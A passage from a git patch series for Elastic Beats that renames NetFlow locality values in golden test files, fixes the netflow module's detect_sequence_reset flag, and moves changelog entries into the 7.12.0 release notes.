-218,7 +218,7 @@ "source": { "bytes": 547, "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "packets": 7, "port": 54594 } @@ -232,7 +232,7 @@ "Fields": { "destination": { "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "port": 49180 }, "event": { @@ -248,7 +248,7 @@ }, "flow": { "id": "HVg4SttTufc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "10.36.236.100", @@ -293,7 +293,7 @@ "source": { "bytes": 7158, "ip": "52.206.251.4", - "locality": "public", + "locality": "external", "packets": 10, "port": 443 } @@ -307,7 +307,7 @@ "Fields": { "destination": { "ip": "52.206.251.4", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -323,7 +323,7 @@ }, "flow": { "id": "HVg4SttTufc", - "locality": "public" + "locality": "external" }, "netflow": { "destination_ipv4_address": "52.206.251.4", @@ -368,7 +368,7 @@ "source": { "bytes": 1538, "ip": "10.36.236.100", - "locality": "private", + "locality": "internal", "packets": 11, "port": 49180 } @@ -382,7 +382,7 @@ "Fields": { "destination": { "ip": "10.36.228.103", - "locality": "private", + "locality": "internal", "port": 8000 }, "event": { @@ -398,7 +398,7 @@ }, "flow": { "id": "3BTOVt9gp8I", - "locality": "private" + "locality": "internal" }, "netflow": { "destination_ipv4_address": "10.36.228.103", @@ -443,7 +443,7 @@ "source": { "bytes": 217, "ip": "10.36.237.22", - "locality": "private", + "locality": "internal", "packets": 3, "port": 52058 } diff --git a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json index 91df765da979..ea23d1283ad0 100644 --- a/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json +++ b/x-pack/filebeat/input/netflow/testdata/golden/netflow9_ubiquiti_edgerouter.pcap.golden.json @@ -7,7 +7,7 @@ "Fields": { "destination": { "ip": "159.65.125.168", - "locality": "public", + "locality": "external", "port": 80 }, "event": { @@ -26,7 +26,7 @@ }, "flow": { "id": "NPZRWU1oZKQ", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -78,7 +78,7 @@ "source": { "bytes": 421, "ip": "10.100.5.2", - "locality": "private", + "locality": "internal", "packets": 6, "port": 43376 } @@ -92,7 +92,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -111,7 +111,7 @@ }, "flow": { "id": "wMmxEUF-2Sk", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -163,7 +163,7 @@ "source": { "bytes": 7621, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 131, "port": 54520 } @@ -177,7 +177,7 @@ "Fields": { "destination": { "ip": "10.100.6.80", - "locality": "private", + "locality": "internal", "port": 62323 }, "event": { @@ -196,7 +196,7 @@ }, "flow": { "id": "2NG48p7EGpw", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -248,7 +248,7 @@ "source": { "bytes": 95, "ip": "10.100.4.1", - "locality": "private", + "locality": "internal", "packets": 1, "port": 53 } @@ -262,7 +262,7 @@ "Fields": { "destination": { "ip": "13.32.251.8", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -281,7 +281,7 @@ }, "flow": { "id": "f0LYEiUntL0", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -333,7 +333,7 @@ "source": { "bytes": 3162, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 30, "port": 54497 } @@ -347,7 +347,7 @@ "Fields": { "destination": { "ip": "52.22.76.61", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -366,7 +366,7 @@ }, "flow": { "id": "9ATz0HlBbIQ", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -418,7 +418,7 @@ "source": { "bytes": 2711, "ip": "10.100.6.80", - "locality": "private", + "locality": "internal", "packets": 13, "port": 50030 } @@ -432,7 +432,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -451,7 +451,7 @@ }, "flow": { "id": "vueGG5QVS_M", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -503,7 +503,7 @@ "source": { "bytes": 20855, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 346, "port": 54517 } @@ -517,7 +517,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -536,7 +536,7 @@ }, "flow": { "id": "rJySLUBW94Y", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -588,7 +588,7 @@ "source": { "bytes": 7495, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 129, "port": 54518 } @@ -602,7 +602,7 @@ "Fields": { "destination": { "ip": "13.32.251.125", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -621,7 +621,7 @@ }, "flow": { "id": "pWQ3ZWUMRfU", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -673,7 +673,7 @@ "source": { "bytes": 7049, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 119, "port": 54519 } @@ -687,7 +687,7 @@ "Fields": { "destination": { "ip": "13.32.251.126", - "locality": "public", + "locality": "external", "port": 443 }, "event": { @@ -706,7 +706,7 @@ }, "flow": { "id": "M0l00u11bWc", - "locality": "public" + "locality": "external" }, "netflow": { "delta_flow_count": 0, @@ -758,7 +758,7 @@ "source": { "bytes": 1348, "ip": "10.100.6.93", - "locality": "private", + "locality": "internal", "packets": 13, "port": 54521 } @@ -772,7 +772,7 @@ "Fields": { "destination": { "ip": "10.100.0.1", - "locality": "private", + "locality": "internal", "port": 53 }, "event": { @@ -791,7 +791,7 @@ }, "flow": { "id": "lzKTutEyrKA", - "locality": "private" + "locality": "internal" }, "netflow": { "delta_flow_count": 0, @@ -843,7 +843,7 @@ "source": { "bytes": 82, "ip": "192.168.1.4", - "locality": "private", + "locality": "internal", "packets": 1, "port": 57253 } From d83c3c46105311672f4a73e4ef85e7f063f513c0 Mon Sep 17 00:00:00 2001 From: Adrian Serrano Date: Mon, 22 Mar 2021 16:27:15 +0100 Subject: [PATCH 06/20] Fix detect_sequence_reset flag in netflow module (#24270) (#24459) This flag was not passed to the input unless set to true, which is the default. It was impossible to turn it off. Fixes #24268 (cherry picked from commit 22e20a134abb38e48687b7323d01ebaab2b0b51c) --- CHANGELOG.next.asciidoc | 1 + x-pack/filebeat/module/netflow/log/config/netflow.yml | 2 -- x-pack/filebeat/module/netflow/log/manifest.yml | 1 + 3 files changed, 2 insertions(+), 2 deletions(-) diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 1b2ea44d6ed6..49e2461e4069 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -254,6 +254,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] - Fix Cisco ASA parser for message 722051. {pull}24410[24410] - Fix `google_workspace` pagination. {pull}24668[24668] +- Fix netflow module ignoring detect_sequence_reset flag. {issue}24268[24268] {pull}24270[24270] *Heartbeat* diff --git a/x-pack/filebeat/module/netflow/log/config/netflow.yml b/x-pack/filebeat/module/netflow/log/config/netflow.yml index dd111c35097c..460b45ee5c93 100644 --- a/x-pack/filebeat/module/netflow/log/config/netflow.yml +++ b/x-pack/filebeat/module/netflow/log/config/netflow.yml @@ -27,9 +27,7 @@ custom_definitions: {{end}} {{end}} -{{ if .detect_sequence_reset}} detect_sequence_reset: {{.detect_sequence_reset}} -{{end}} tags: {{.tags | tojson}} publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} diff --git a/x-pack/filebeat/module/netflow/log/manifest.yml b/x-pack/filebeat/module/netflow/log/manifest.yml index 250c2b414e93..a2a591a5258a 100644 --- a/x-pack/filebeat/module/netflow/log/manifest.yml +++ b/x-pack/filebeat/module/netflow/log/manifest.yml @@ -15,6 +15,7 @@ var: - name: timeout - name: custom_definitions - name: detect_sequence_reset + default: true - name: tags default: [forwarded] - name: internal_networks From 60dddefc58abaa50a90c10b1c02277c08dd54873 Mon Sep 17 00:00:00 2001 From: Elastic Machine Date: Mon, 22 Mar 2021 13:06:09 -0400 Subject: [PATCH 07/20] docs: Prepare Changelog for 7.12.0 (#24656) * docs: Close changelog for 7.12.0 * 23334 is not a breaking change * Fix link * Fix dangling line * More fixes * No need to add empty lines * Some cleanup * Final cleanup * Additional fix * Apply suggestions from code review Co-authored-by: Brandon Morelli Co-authored-by: Andres Rodriguez Co-authored-by: Andres Rodriguez Co-authored-by: Brandon Morelli --- CHANGELOG.asciidoc | 160 ++++++++++++++++++++++++ CHANGELOG.next.asciidoc | 225 ---------------------------------- libbeat/docs/release.asciidoc | 1 + 3 files changed, 161 insertions(+), 225 deletions(-) diff --git a/CHANGELOG.asciidoc b/CHANGELOG.asciidoc index 51c0f1f8aea3..68d0f9291afd 100644 --- a/CHANGELOG.asciidoc +++ b/CHANGELOG.asciidoc @@ -3,6 +3,166 @@ :issue: https://github.com/elastic/beats/issues/ :pull: https://github.com/elastic/beats/pull/ +[[release-notes-7.12.0]] +=== Beats version 7.12.0 +https://github.com/elastic/beats/compare/v7.11.2...v7.12.0[View commits] + +==== Breaking changes + +*Filebeat* + +- Rename `s3` input to `aws-s3` input. {pull}23469[23469] + +*Heartbeat* + +- Refactor synthetics configuration to new syntax. {pull}23467[23467] + +==== Bugfixes + +*Affecting all Beats* + +- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] +- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] +- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] +- Fix panic with inline SSL when the certificate or key was smaller than 256 bytes. {issue}23820[23820] {pull}23858[23858] + +*Auditbeat* + +- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] +- system/login: Add additional offset check for utmp files. {pull}24515[24515] + +*Filebeat* + +- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] +- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] +- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] +- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] +- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] +- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] +- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] +- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] +- Add check for empty values in azure module. {pull}24156[24156] +- Change the `event.created` in Netflow events to be the time the event was created by Filebeat +- Fix Zoom module parameters for basic auth and url path. {pull}23779[23779] +- Use rfc6587 framing for fortinet firewall and clientendpoint filesets when transferring over tcp. {pull}23837[23837] +- Fix httpjson input logging so it doesn't conflict with ECS. {pull}23972[23972] +- Fix Logstash module handling of logstash.log.log_event.action field. {issue}20709[20709] +- aws/s3access dataset was populating event.duration using the wrong unit. {pull}23920[23920] +- Zoom module pipeline failed to ingest some chat_channel events. {pull}23904[23904] +- Fix Netlow module issue with missing `internal_networks` config parameter. {issue}24094[24094] {pull}24110[24110] +- in httpjson input using encode_as "application/x-www-form-urlencoded" now sets Content-Type correctly {issue}24331[24331] {pull}24336[24336] +- Fix default `scope` in `add_nomad_metadata`. {issue}24559[24559] + +*Metricbeat* + +- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] +- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] +- Unskip s3_request integration test. {pull}23887[23887] +- Add system.hostfs configuration option for system module. {pull}23831[23831] + +==== Added + +*Affecting all Beats* + +- Honor kube event resysncs to handle missed watch events {pull}22668[22668] +- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] +- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] +- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] +- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] +- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] +- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] +- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] +- Add deployment name in pod's meta. {pull}23610[23610] +- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] +- Add `selector` information in Kubernetes services' metadata. {pull}23730[23730] + +*Auditbeat* + +- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] +- system/host: Add new ECS 1.8 field `os.type` in `host.os.type`. {pull}23513[23513] +- Update Auditbeat auditd module to ECS 1.8 {pull}23594[23594] {issue}23118[23118] + +*Filebeat* + +- Add parsing of tcp flags to AWS vpcflow fileset {issue}228020[22820] {pull}23157[23157] +- Added support for first_event context in Filebeat httpjson input {pull}23437[23437] +- Adding Threat Intel module {pull}21795[21795] +- Added username parsing from Cisco ASA message 302013. {pull}21196[21196] +- Added `encode_as` and `decode_as` options to httpjson along with pluggable encoders/decoders {pull}23478[23478] +- Added feature to modules to adapt Ingest Node pipelines for compatibility with older Elasticsearch versions by removing unsupported processors. {pull}23763[23763] +- Added support for Cisco AMP API as a new fileset. {pull}22768[22768] +- Added RFC6587 framing option for tcp and unix inputs {issue}23663[23663] {pull}23724[23724] +- Added `application/x-ndjson` as decode option for httpjson input {pull}23521[23521] +- Added `application/x-www-form-urlencoded` as encode option for httpjson input {pull}23521[23521] +- Move aws-s3 input to GA. {pull}23631[23631] +- Populate `source.mac` and `destination.mac` for Suricata EVE events. {issue}23706[23706] {pull}23721[23721] +- Added string splitting for httpjson input {pull}24022[24022] +- Added Signatures fileset to Zeek module {pull}23772[23772] +- Upgrade Cisco ASA/FTD/Umbrella to ECS 1.8.0. {pull}23819[23819] +- Add new ECS user and categories features to google_workspace/gsuite {issue}23118[23118] {pull}23709[23709] +- Move crowdstrike JS processor to ingest pipelines and upgrade to ECS 1.8.0 {issue}23118[23118] {pull}23875[23875] +- Update Filebeat auditd dataset to ECS 1.8.0. {pull}23723[23723] {issue}23118[23118] +- Updated microsoft defender_atp and m365_defender to ECS 1.8. {pull}23897[23897] {issue}23118[23118] +- Updated o365 module to ECS 1.8. {issue}23118[23118] {pull}23896[23896] +- Upgrade CEF module to ECS 1.8.0. {pull}23832[23832] +- Upgrade fortinet/firewall to ECS 1.8 {issue}23118[23118] {pull}23902[23902] +- Upgrade Zeek to ECS 1.8.0. {issue}23118[23118] {pull}23847[23847] +- Updated azure module to ECS 1.8. {issue}23118[23118] {pull}23927[23927] +- Update aws/s3access to ECS 1.8. {issue}23118[23118] {pull}23920[23920] +- Upgrade panw module to ECS 1.8 {issue}23118[23118] {pull}23931[23931] +- Updated aws/cloudtrail fileset to ECS 1.8. {issue}23118[23118] {pull}23911[23911] +- Upgrade juniper/srx to ECS 1.8.0. {issue}23118[23118] {pull}23936[23936] +- Update mysqlenterprise module to ECS 1.8. {issue}23118[23118] {pull}23978[23978] +- Upgrade sophos/xg fileset to ECS 1.8.0. {issue}23118[23118] {pull}23967[23967] +- Upgrade system/auth to ECS 1.8 {issue}23118[23118] {pull}23961[23961] +- Upgrade elasticsearch/audit to ECS 1.8 {issue}23118[23118] {pull}24000[24000] +- Upgrade okta to ECS 1.8.0 and move js processor to ingest pipeline {issue}23118[23118] {pull}23929[23929] +- Update zoom module to ECS 1.8. {pull}23904[23904] {issue}23118[23118] +- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] + +*Heartbeat* + +- Bundle synthetics dependencies with Heartbeat docker image. {pull}23274[23274] + +*Heartbeat* + +- Update Journalbeat to ECS 1.8. {pull}23737[23737] + +*Metricbeat* + +- Enrich events of `state_service` metricset with Kubernetes services' metadata. {pull}23730[23730] +- Add support for Darwin/arm M1. {pull}24019[24019] +- Check fields are documented in AWS metricsets. {pull}23887[23887] +- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] +- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}23905[23905] + +*Packetbeat* + +- Upgrade to ECS 1.8.0. {pull}23783[23783] +- Add `event.type: [connection]` to flow events and include `end` for final flows. {pull}24564[24564] + +*Functionbeat* + +- Provide more ways to set AWS credentials. {issue}12464[12464] {pull}23344[23344] +- Add support for multiple regions {pull}21065[21065] + +*Heartbeat* + +- Add support for script processor. {pull}23229[23229] + +*Winlogbeat* + +- Add Audit and Authentication Policy Change Events and related.ip information {pull}20684[20684] +- Add new ECS 1.8 improvements. {pull}23563[23563] +- Remove deprecated eventlogging API that was used for Windows XP/2003 and associated unused code. {pull}24463[24463] + +==== Deprecated + +*Affecting all Beats* + +- Selecting `full` in `ssl.verification_mode` option will not treat CommonName field in x509 certificates as a hostname when Subject Alternative Name is not present from v8.0. Please update your certificates so it contains at least one DNSName instead of relying on CommonName in the new major version of Beats. + + [[release-notes-7.11.2]] === Beats version 7.11.2 https://github.com/elastic/beats/compare/v7.11.1...v7.11.2[View commits] diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 49e2461e4069..91fecb4957b4 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ -18,13 +18,11 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Remove `AddDockerMetadata` and `AddKubernetesMetadata` processors from the `script` processor. They can still be used as normal processors in the configuration. {issue}16349[16349] {pull}16514[16514] - Introduce APM libbeat instrumentation, active when running the beat with ELASTIC_APM_ACTIVE=true. {pull}17938[17938] - Make error message about locked data path actionable. {pull}18667[18667] -- Fix panic with inline SSL when the certificate or key were small than 256 bytes. {pull}23820[23820] *Auditbeat* *Filebeat* -- Add fileset to ingest PostgreSQL CSV logs. {pull}23334[23334] - Fix parsing of Elasticsearch node name by `elasticsearch/slowlog` fileset. {pull}14547[14547] - Improve ECS field mappings in panw module. event.outcome now only contains success/failure per ECS specification. {issue}16025[16025] {pull}17910[17910] - Improve ECS categorization field mappings for nginx module. http.request.referrer only populated when nginx sets a value {issue}16174[16174] {pull}17844[17844] @@ -51,8 +49,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Possible values for Netflow's locality fields (source.locality, destination.locality and flow.locality) are now `internal` and `external`, instead of `private` and `public`. {issue}24272[24272] {pull}24295[24295] *Heartbeat* -- Adds negative body match. {pull}20728[20728] -- Refactor synthetics configuration to new syntax. {pull}23467[23467] *Journalbeat* @@ -65,13 +61,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - kubernetes.container.cpu.limit.cores and kubernetes.container.cpu.requests.cores are now floats. {issue}11975[11975] - Fix ECS compliance of user.id field in system/users metricset {pull}19019[19019] - Remove "invalid zero" metrics on Windows and Darwin, don't report linux-only memory and diskio metrics when running under agent. {pull}21457[21457] -- Change cloud.provider from googlecloud to gcp. {pull}21775[21775] -- API address and shard ID are required settings in the Cloud Foundry module. {pull}21759[21759] -- Rename googlecloud module to gcp module. {pull}22246[22246] -- Use ingress/egress instead of inbound/outbound for system/socket metricset. {pull}22992[22992] -- Change types of numeric metrics from Kubelet summary api to double so as to cover big numbers. {pull}23335[23335] -- Add container.image.name and containe.name ECS fields for state_container. {pull}23802[23802] -- Add support for the MemoryPressure, DiskPressure, OutOfDisk and PIDPressure status conditions in state_node. {pull}[23905] *Packetbeat* @@ -128,24 +117,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add service resource in k8s cluster role. {pull}20546[20546] - [Metricbeat][Kubernetes] Change cluster_ip field from ip to keyword. {pull}20571[20571] - The `o365input` and `o365` module now recover from an authentication problem or other fatal errors, instead of terminating. {pull}21258[21258] -- Orderly close processors when processing pipelines are not needed anymore to release their resources. {pull}16349[16349] -- Fix memory leak and events duplication in docker autodiscover and add_docker_metadata. {pull}21851[21851] -- Fix parsing of expired licences. {issue}21112[21112] {pull}22180[22180] -- Fix duplicated pod events in kubernetes autodiscover for pods with init or ephemeral containers. {pull}22438[22438] -- Fix FileVersion contained in Windows exe files. {pull}22581[22581] -- Fix index template loading when the new index format is selected. {issue}22482[22482] {pull}22682[22682] -- Log debug message if the Kibana dashboard can not be imported from the archive because of the invalid archive directory structure {issue}12211[12211], {pull}13387[13387] - Periodic metrics in logs will now report `libbeat.output.events.active` and `beat.memstats.rss` - as gauges (rather than counters). {pull}22877[22877] -- Use PROGRAMDATA environment variable instead of C:\ProgramData for windows install service {pull}22874[22874] -- Fix reporting of cgroup metrics when running under Docker {pull}22879[22879] -- Fix typo in config docs {pull}23185[23185] -- Fix `nested` subfield handling in generated Elasticsearch templates. {issue}23178[23178] {pull}23183[23183] -- Fix CPU usage metrics on VMs with dynamic CPU config {pull}23154[23154] -- Fix panic due to unhandled DeletedFinalStateUnknown in k8s OnDelete {pull}23419[23419] -- Fix error loop with runaway CPU use when the Kafka output encounters some connection errors {pull}23484[23484] -- Fix issue discovering docker containers and metadata after reconnections {pull}24318[24318] -- Allow configuring credential_profile_name and shared_credential_file when using role_arn. {pull}24174[24174] *Auditbeat* @@ -156,20 +128,9 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - system/package: Fix an error that can occur while trying to persist package metadata. {issue}18536[18536] {pull}18887[18887] - system/socket: Fix dataset using 100% CPU and becoming unresponsive in some scenarios. {pull}19033[19033] {pull}19764[19764] - system/socket: Fixed tracking of long-running connections. {pull}19033[19033] -- system/login: Fixed offset reset on inode reuse. {pull}24414[24414] -- system/login: Add additional offset check for utmp files. {pull}24515[24515] *Filebeat* -- CheckPoint Firewall module: Change event.severity JSON data type to a number because the field mapping is a `long`. {pull}23424[23424] -- Cisco IOS: Change icmp.type/code and igmp.type JSON data types to strings because the fields mappings are `keyword`. {pull}23424[23424] -- CrowdStrike Falcon: Change JSON field types to match the field mappings. {pull}23424[23424] -- Fortinet Firewall: Drop `fortinet.firewall.assignip` when the value is "N/A". {pull}23424[23424] -- Juniper SRX: Change JSON field types to match the field mappings. {pull}23424[23424] -- Suricata EVE: Convert `suricata.eve.flow_id` to string because the field is a keyword in the mapping. {pull}23424[23424] -- Zeek DNS: Ignore failures in data type conversions. And change `dns.id` JSON field to a string to match its `keyword` mapping. {pull}23424[23424] -- Update `filestream` reader offset when a line is skipped. {pull}23417[23417] -- Add check for empty values in azure module. {pull}24156[24156] - cisco/asa fileset: Fix parsing of 302021 message code. {pull}14519[14519] - Fix filebeat azure dashboards, event category should be `Alert`. {pull}14668[14668] - Fixed dashboard for Cisco ASA Firewall. {issue}15420[15420] {pull}15553[15553] @@ -212,23 +173,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Fix `cisco` asa and ftd parsing of messages 106102 and 106103. {pull}20469[20469] - Fix event.kind for system/syslog pipeline {issue}20365[20365] {pull}20390[20390] - Fix event.type for zeek/ssl and duplicate event.category for zeek/connection {pull}20696[20696] -- Fix long registry migration times. {pull}20717[20717] {issue}20705[20705] -- Fix event types and categories in auditd module to comply with ECS {pull}20652[20652] -- Update documentation in the azure module filebeat. {pull}20815[20815] -- Remove wrongly mapped `tls.client.server_name` from `fortinet/firewall` fileset. {pull}20983[20983] -- Fix an error updating file size being logged when EOF is reached. {pull}21048[21048] -- Fix error when processing AWS Cloudtrail Digest logs. {pull}21086[21086] {issue}20943[20943] -- Provide backwards compatibility for the `set` processor when Elasticsearch is less than 7.9.0. {pull}20908[20908] -- Handle multiple upstreams in ingress-controller. {pull}21215[21215] -- Provide backwards compatibility for the `append` processor when Elasticsearch is less than 7.10.0. {pull}21159[21159] -- Fix checkpoint module when logs contain time field. {pull}20567[20567] -- Add field limit check for AWS Cloudtrail flattened fields. {pull}21388[21388] {issue}21382[21382] -- Fix syslog RFC 5424 parsing in the CheckPoint module. {pull}21854[21854] - Add json body check for sqs message. {pull}21727[21727] -- Fix incorrect connection state mapping in zeek connection pipeline. {pull}22151[22151] {issue}22149[22149] -- Fix Zeek dashboard reference to `zeek.ssl.server.name` field. {pull}21696[21696] -- Fix handing missing eventtime and assignip field being set to N/A for fortinet module. {pull}22361[22361] -- Fix for `field [source] not present as part of path [source.ip]` error in azure pipelines. {pull}22377[22377] - Drop aws.vpcflow.pkt_srcaddr and aws.vpcflow.pkt_dstaddr when equal to "-". {pull}22721[22721] {issue}22716[22716] - Fix cisco umbrella module config by adding input variable. {pull}22892[22892] - Fix network.direction logic in zeek connection fileset. {pull}22967[22967] @@ -317,20 +262,7 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add support for azure light metricset app_stats. {pull}20639[20639] - Fix remote_write flaky test. {pull}21173[21173] - Remove io.time from windows {pull}22237[22237] -- Change Session ID type from int to string {pull}22359[22359] -- Fix filesystem types on Windows in filesystem metricset. {pull}22531[22531] -- Fix failiures caused by custom beat names with more than 15 characters {pull}22550[22550] -- Stop generating NaN values from Cloud Foundry module to avoid errors in outputs. {pull}22634[22634] -- Update NATS dashboards to leverage connection and route metricsets {pull}22646[22646] -- Fix rate metrics in Kafka broker metricset by using last minute rate instead of mean rate. {pull}22733[22733] - Fix `logstash` module when `xpack.enabled: true` is set from emitting redundant events. {pull}22808[22808] -- Change vsphere.datastore.capacity.used.pct value to betweeen 0 and 1. {pull}23148[23148] -- Update config in `windows.yml` file. {issue}23027[23027]{pull}23327[23327] -- Add stack monitoring section to elasticsearch module documentation {pull}#23286[23286] -- Fix metric grouping for windows/perfmon module {issue}23489[23489] {pull}23505[23505] -- Fix ec2 metricset fields.yml and the integration test {pull}23726[23726] -- Unskip s3_request integration test. {pull}23887[23887] -- Add system.hostfs configuration option for system module. {pull}23831[23831] *Packetbeat* @@ -376,38 +308,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Add capability of enriching process metadata with contianer id also for non-privileged containers in `add_process_metadata` processor. {pull}19767[19767] - Add replace_fields config option in add_host_metadata for replacing host fields. {pull}20490[20490] {issue}20464[20464] - Add option to select the type of index template to load: legacy, component, index. {pull}21212[21212] -- Add istiod metricset. {pull}21519[21519] -- Release `add_cloudfoundry_metadata` as GA. {pull}21525[21525] -- Add support for OpenStack SSL metadata APIs in `add_cloud_metadata`. {pull}21590[21590] -- Add cloud.account.id for GCP into add_cloud_metadata processor. {pull}21776[21776] -- Add proxy metricset for istio module. {pull}21751[21751] -- Add kubernetes.node.hostname metadata of Kubernetes node. {pull}22189[22189] -- Enable always add_resource_metadata for Pods and Services of kubernetes autodiscovery. {pull}22189[22189] -- Add add_resource_metadata option setting (always enabled) for add_kubernetes_metadata setting. {pull}22189[22189] -- Added Kafka version 2.2 to the list of supported versions. {pull}22328[22328] -- Add support for ephemeral containers in kubernetes autodiscover and `add_kubernetes_metadata`. {pull}22389[22389] {pull}22439[22439] -- Added support for wildcard fields and keyword fallback in beats setup commands. {pull}22521[22521] -- Fix polling node when it is not ready and monitor by hostname {pull}22666[22666] -- Add `expand_keys` option to `decode_json_fields` processor and `json` input, to recusively de-dot and expand json keys into hierarchical object structures {pull}22849[22849] -- Update k8s client and release k8s leader lock gracefully {pull}22919[22919] -- Improve event normalization performance {pull}22974[22974] -- Add tini as init system in docker images {pull}22137[22137] -- Added "detect_mime_type" processor for detecting mime types {pull}22940[22940] -- Added "add_network_direction" processor for determining perimeter-based network direction. {pull}23076[23076] -- Added new `rate_limit` processor for enforcing rate limits on event throughput. {pull}22883[22883] -- Allow node/namespace metadata to be disabled on kubernetes metagen and ensure add_kubernetes_metadata honors host {pull}23012[23012] -- Improve equals check. {pull}22778[22778] -- Honor kube event resysncs to handle missed watch events {pull}22668[22668] -- Add autodiscover provider and metadata processor for Nomad. {pull}14954[14954] {pull}23324[23324] -- Add `processors.rate_limit.n.dropped` monitoring counter metric for the `rate_limit` processor. {pull}23330[23330] -- Deprecate aws_partition config parameter for AWS, use endpoint instead. {pull}23539[23539] -- Update the baseline version of Sarama (Kafka support library) to 1.27.2. {pull}23595[23595] -- Add kubernetes.volume.fs.used.pct field. {pull}23564[23564] -- Add the `enable_krb5_fast` flag to the Kafka output to explicitly opt-in to FAST authentication. {pull}23629[23629] -- Added new decode_xml processor to libbeat that is available to all beat types. {pull}23678[23678] -- Add deployment name in pod's meta. {pull}23610[23610] -- Added ECS 1.8 `host.os.type` field to `add_host_metadata` processor. {pull}23513[23513] -- Add `selector` information in kubernetes services' metadata. {pull}23730[23730] *Auditbeat* @@ -416,11 +316,6 @@ https://github.com/elastic/beats/compare/v7.0.0-alpha2...master[Check the HEAD d - Log to stderr when running using reference kubernetes manifests. {pull}17443[174443] - Fix syscall kprobe arguments for 32-bit systems in socket module. {pull}17500[17500] - Add ECS categorization info for auditd module {pull}18596[18596] -- Add several improvements for auditd module for improved ECS field mapping {pull}22647[22647] -- Add ECS 1.7 `configuration` categorization in certain events in auditd module. {pull}23000[23000] -- Improve file_integrity monitoring when a file is created/deleted in quick succession. {issue}17347[17347] {pull}22170[22170] -- system/host: 